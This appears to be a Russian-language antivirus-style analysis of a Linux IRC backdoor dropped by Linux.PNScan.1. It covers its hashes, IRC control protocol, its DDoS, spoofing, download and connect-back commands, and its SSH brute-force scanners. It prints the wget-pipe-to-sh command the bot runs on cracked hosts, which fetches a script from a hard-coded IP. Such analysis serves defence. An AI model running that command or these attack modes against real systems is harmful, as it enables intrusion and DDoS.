SHA1:
- 3a99f7816c6864fd36ceea3380e591d337b0b241 (unpacked)
- 691704fb9de3e1d4a6c5b84b99be71ef375257a8 (packed)
Бэкдор для операционных систем семейства Linux, устанавливаемый троянцем Linux.PNScan.1. В качестве лок-файла используется "/var/run/.boss.pid".
Для соединения с управляющим IRC-сервером формирует строку имени и псевдонима следующим образом:
m64|dog|root|%c%c%c%c%c%c%c%c%cгде %c – случайный символ из набора цифр ("0123456789").
При успешном подключении к IRC-серверу отправляет команды:
NICK <nick>\n
USER x00 localhost localhost :dogscan\nгде <nick> - псевдоним, сформированный по указанному выше алгоритму.
При подключении к IRC-серверу вредоносная программа ожидает поступления входящих команд. Бэкдор способен выполнять следующий базовый набор команд:
| Команда | Действие | Комментарий |
|---|---|---|
| 352 | Установить поддельный IP | |
| 376 | Зайти на канал | Send(fd, "MODE %s -xi\n", nick); Send(fd, "MODE %s +B\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass); |
| 433 | Сгенерировать новый ник | |
| ERROR | Сгенерировать новый ник | |
| 422 | Зайти на канал | Send(fd, "MODE %s -xi\n", nick); Send(fd, "MODE %s +B\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass); |
| NICK | Поменять ник на строку из команды | |
| PING | Отправить PONG | |
| PRIVMSG | Выполнить специальную команду |
Помимо этого, троянец способен выполнять следующий набор расширенных команд:
| Команда | Действие | Синтаксис |
|---|---|---|
| RANDOMFLOOD | Случайным образом переключиться между режимами ACK и SYN Flood | RANDOMFLOOD <target> <port> <secs> |
| NSACKFLOOD | ACK Flood | NSACKFLOOD <target> <port> <secs> |
| NSSYNFLOOD | SYN Flood | NSSYNFLOOD <target> <port> <secs> |
| ACKFLOOD | ACK Flood (spoofed) | |
| SYNFLOOD | SYN Flood (spoofed) | SYNFLOOD <target> <port> <secs> |
| UDP | UDP Flood | UDP <target> <port> <secs> |
| UNKNOWN | Начать DDoS-атаку | UNKNOWN <target> <secs> |
| SERVER | Сменить сервер на указанный в команде | |
| GETSPOOFS | Получить параметры спуфинга | |
| SPOOFS | Установить IP или диапазон IP для спуфинга | SPOOFS <iprange/ip> |
| GET | Выполнить загрузку указанного файла | GET <url> <save as> |
| VERSION | Возвратить версию бэкдора | |
| KILLALL | Прекратить DDoS-атаку | |
| HELP | Показать список доступных команд | |
| CBACK | Бэкконнект | CBACK <ip> <port> connectback shell |
| SCANRND | Взлом SSH. Выбираются случайные IP из диапазона, используется стандартный словарь | SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> |
| SCANRND2 | Взлом SSH. Выбираются случайные IP из диапазона, словарь указывается во входных параметрах | SCANRND2 <192 or 192.168 or 192.168.0> <threads> <minutes> <user> <passwd> |
| SCANSUB | Взлом SSH. Перебираются все IP из диапазона, используется стандартный словарь | SCANSUB <192.168> <threads> |
| SCANSUB2 | Взлом SSH. Перебираются все IP из диапазона, словарь указывается во входных параметрах | SCANSUB2 <192.168> <threads> <user> <passwd> |
| DOGRND | Взлом SSH. Перебираются случайные IP из диапазона, используется стандартный словарь | DOGRND <192 or 192.168 or 192.168.0> <threads> <minutes> |
| DOGSUB | Взлом SSH. Перебираются все IP из диапазона, используется стандартный словарь | DOGSUB <192.168> <threads> |
| IRC | Отправка указанных команд IRC на сервер | IRC <arg1> <arg2> <arg...> |
| SH | Выполнить набор sh-команд | SH <arg1> <arg2> <arg...> |
SCANRND, SCANRND2, SCANSUB, SCANSUB2 после успешного подбора пары login:password выполняют в удаленной системе команду:
wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>↦1или
wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>↦1 Скачиваемые скрипты устанавливают в систему Linux.BackDoor.Tsunami.144.
DOGRND, DOGSUB после подбора пары login:password выполняют команду:
uname -a || echo - После чего пользователю "##scaninfo##" в IRC-чате будет послана информация вида:
[g+] <login>@<ip> | <password> | <os> \n